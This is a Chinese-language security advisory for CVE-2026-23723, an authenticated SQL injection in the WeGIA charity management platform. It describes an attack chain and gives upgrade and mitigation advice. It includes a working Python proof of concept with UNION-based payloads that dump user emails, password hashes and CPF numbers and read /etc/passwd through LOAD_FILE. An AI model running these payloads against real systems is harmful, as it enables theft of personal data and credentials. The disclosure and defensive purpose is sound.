CVE-2026-23723 WeGIA SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-23723

漏洞类型

SQL注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WeGIA

漏洞概述

CVE-2026-23723是WeGIA慈善机构Web管理器中存在的一个严重SQL注入漏洞。该漏洞于2026年1月16日披露，影响3.6.2之前的所有版本。WeGIA是一款专为慈善机构设计的Web管理平台，用于管理慈善组织的日常运营。漏洞存在于Atendido_ocorrenciaControle端点的id_memorando参数中，由于对用户输入缺乏充分的参数化查询过滤，攻击者可以通过构造恶意SQL语句实现数据库注入攻击。成功利用此漏洞可导致完整的数据库泄露，包括敏感的个人身份信息(PII)泄露，以及在配置不当的环境中可能实现任意文件读取。该漏洞需要认证用户权限才能利用，CVSS评分7.2，属于高危级别漏洞。建议受影响的用户尽快升级到3.6.2或更高版本以修复此安全问题。

技术细节

该SQL注入漏洞位于WeGIA的Atendido_ocorrenciaControle控制器中，具体是通过id_memorando参数进行注入。漏洞的根本原因是在处理用户输入时未使用参数化查询，而是直接将用户输入拼接到SQL语句中。攻击者需要具备认证的高权限账户才能访问受影响的端点。一旦成功注入，攻击者可以执行任意SQL命令，包括但不限于：UNION SELECT语句用于数据提取、基于时间的盲注技术用于推断数据、LOAD_FILE()函数读取服务器文件、以及INTO OUTFILE写入恶意文件。在某些配置环境下，通过SQL注入结合MySQL的LOAD_FILE和INTO OUTFILE功能，攻击者甚至可以实现任意文件读取和远程代码执行。修复版本3.6.2通过实现参数化查询和输入验证来解决此问题。

攻击链分析

STEP 1

1. 信息收集

攻击者首先识别目标服务器上运行的WeGIA版本，确认版本小于3.6.2

STEP 2

2. 认证获取

攻击者获取WeGIA的高权限账户凭据，或通过其他方式获取有效会话

STEP 3

3. 漏洞探测

使用SQL注入测试payload探测id_memorando参数是否存在注入点

STEP 4

4. 注入执行

通过UNION SELECT或盲注技术执行SQL语句，提取数据库结构信息

STEP 5

5. 数据泄露

枚举数据库表和列，提取敏感数据包括用户凭据、PII等信息

STEP 6

6. 权限提升/持久化

在配置不当的环境中，利用LOAD_FILE/INTO OUTFILE实现文件读取或写入webshell

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-23723 SQL Injection PoC
# Target: WeGIA < 3.6.2
# Endpoint: Atendido_ocorrenciaControle
# Parameter: id_memorando

target_url = "http://target-server/WeGIA/Atendido_ocorrenciaControle"

# Authentication (requires high privilege account)
login_url = "http://target-server/WeGIA/login.php"
credentials = {
    "username": "admin_user",
    "password": "password"
}

session = requests.Session()

# Login to obtain authenticated session
login_response = session.post(login_url, data=credentials)
if "authenticated" not in login_response.text:
    print("[-] Authentication failed")
    sys.exit(1)

print("[+] Successfully authenticated")

# SQL Injection payloads
payloads = [
    # Basic injection to confirm vulnerability
    "1' OR '1'='1",
    # Union-based injection for data extraction
    "1' UNION SELECT NULL,NULL,NULL,version(),user()-- -",
    # Database enumeration
    "1' UNION SELECT schema_name,NULL,NULL,NULL,NULL FROM information_schema.schemata-- -",
    # Table enumeration
    "1' UNION SELECT table_name,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema='wegia'-- -",
    # Column enumeration
    "1' UNION SELECT column_name,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='usuario'-- -",
    # Data exfiltration
    "1' UNION SELECT id_usuario,email,senha_hash,nome,cpf FROM usuario-- -",
    # File read (if privileged)
    "1' UNION SELECT NULL,NULL,LOAD_FILE('/etc/passwd'),NULL,NULL-- -"
]

for i, payload in enumerate(payloads):
    params = {"id_memorando": payload}
    try:
        response = session.get(target_url, params=params, timeout=10)
        print(f"\n[Payload {i+1}]: {payload}")
        print(f"Status: {response.status_code}")
        if "SQL" in response.text or "error" in response.text.lower():
            print("[!] Potential SQL error detected")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

影响范围

WeGIA < 3.6.2

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 通过网络层ACL限制对Atendido_ocorrenciaControle端点的访问，仅允许受信任的IP地址访问；2) 部署WAF规则识别和阻止常见的SQL注入模式；3) 临时禁用受影响的端点功能；4) 增强数据库账户权限控制，确保应用账户不具备FILE权限和敏感表的管理权限；5) 启用详细的数据库查询日志，监控可疑的SQL注入行为。